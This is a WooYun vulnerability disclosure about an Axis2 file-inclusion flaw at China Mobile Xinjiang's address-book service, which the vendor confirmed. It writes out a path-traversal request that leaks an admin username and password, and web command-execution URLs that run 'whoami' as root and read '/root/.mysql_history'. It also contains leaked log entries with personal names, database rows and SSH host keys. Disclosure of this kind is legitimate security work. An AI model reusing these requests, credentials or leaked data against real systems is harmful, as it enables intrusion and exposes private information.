漏洞详情披露状态: 2016-04-27: 细节已通知厂商并且等待厂商处理中2016-04-29: 厂商已经确认,细节仅向厂商公开2016-05-09: 细节向核心白帽子及相关领域专家公开2016-05-19: 细节向普通白帽子公开2016-05-29: 细节向实习白帽子公开2016-06-13: 细节向公众公开简要描述:中国移动通信集团新疆集团通讯录某处文件包含导致命令执行Getshell详细说明:中国移动通信集团新疆有限公司 技术支持**.**.**.**:8080/**.**.**.**:8080/axis2/services/Version?xsd=../conf/axis2.xmlcode 区域<parameter name="userName">jttxl_axis_username</parameter><parameter name="password">axisSf*sji3255</parameter>**.**.**.**:8080/axis2/axis2-admin/listService登录 axis2、**.**.**.**:8080//axis2/services/Cat/exec?cmd=whoamiroot 权限/opt/apache-tomcat-7.0.55/webapps/axis2/WEB-INF/titlees/下面还存在文件遍历、4**.**.**.**:8080/download/**.**.**.**:8080/download/indextomcat.jsp直接getshell、**.**.**.**:8080/Group/logs/smms.log日志泄漏信息[jdbc:mysql**.**.**.**:3306/jttxl?useUnicode=true&characterEncoding=UTF-8]][2016-04-27 01:00:10,674] [DEBUG] [sql.ResultSet ] [{rset-100050} Result: [08558047627791600147, 张丽,魏爱东等]][2016-04-27 01:00:10,674] [DEBUG] [sql.ResultSet ] [{rset-100050} Result: [99021592896422007516, 魏国孝,王檬等]]**.**.**.**:8080/fileser/resources/image/upload/文件遍历信息泄漏、**.**.**.**:8080//axis2/services/Cat/exec?cmd=cat%20%20/root/.mysql_historylinux中mysql记录、code 区域NULL COMMENT '新疆移动二级部门',
`area_code` varchar(10) DEFAULT NULL COMMENT '地州编码',
`area_name` varchar(64) DEFAULT NULL COMMENT '地州名称',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `sys_dept_area_info` ( `id` varchar(32) NOT NULL, `department_name` varchar(64) NOT NULL COMMENT '新疆移动二级部门', `area_code` varchar(10) DEFAULT NULL COMMENT '地州编码', `area_name` varchar(64) DEFAULT NULL COMMENT '地州名称', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0000', '乌鲁木齐市分公司', '6501', '乌鲁木齐');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0001', '阿克苏分公司', '6529', '阿克苏');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0002', '区公司', '6501', '乌鲁木齐');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0003', '新开户', '6501', '乌鲁木齐');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0004', '阿勒泰分公司', '6543', '阿勒泰');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0005', '巴州分公司', '6528', '巴州');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0006', '博州移动公司', '6527', '博州');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0007', '昌吉分公司', '6523', '昌吉');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0008', '哈密分公司', '6522', '哈密');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0009', '和田分公司', '6532', '和田');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0010', '喀什分公司', '6531', '喀什');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0011', '克拉玛依分公司', '6502', '克拉玛依');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0012', '克州移动', '6530', '克州');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0013', '奎屯分公司', '654003', '奎屯');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0014', '石河子分公司', '659001', '石河子');信任连接、code 区域**.**.**.**]:30000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApWKcM1Ltsn0e8D32Yn4ZnAIcdMKfuGTQ5/S4thMk0mgl2RRljKFjKvy4ElkN1HS9/2bQ8iL3gOWHVGUYm9Nh9izMhPO6E6Z6o3wwpaxmKhJQVRbbWsQ+07widH7AAs8IP5dTJ8OjcEawcknnjorZaAn7xvotA+mTbPL8Kag8Bn2Sp4Ln44VQB2bATBq6kHUf1f3z+tFzyjMDkOjSb6RPCNYN4kEaglL0RgE71SpoLTg4VQ1s662rdTifDtFRR0kj8CJi0DkdvMKKmWwa6eMak92ScD4EmBNkOOGpJT2d1d7nprvyK4DtMumTSjEMhYjGdB/x3yAh87Pr7/3QrMQLgw==
[**.**.**.**]:30000 ssh-rsaok漏洞证明:上面的了修复方案:升级axis2!版权声明:转载请注明来源 路人甲@乌云漏洞回应厂商回应:危害等级:高漏洞Rank:11确认时间:2016-04-29 10:46厂商回复:CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。最新状态:暂无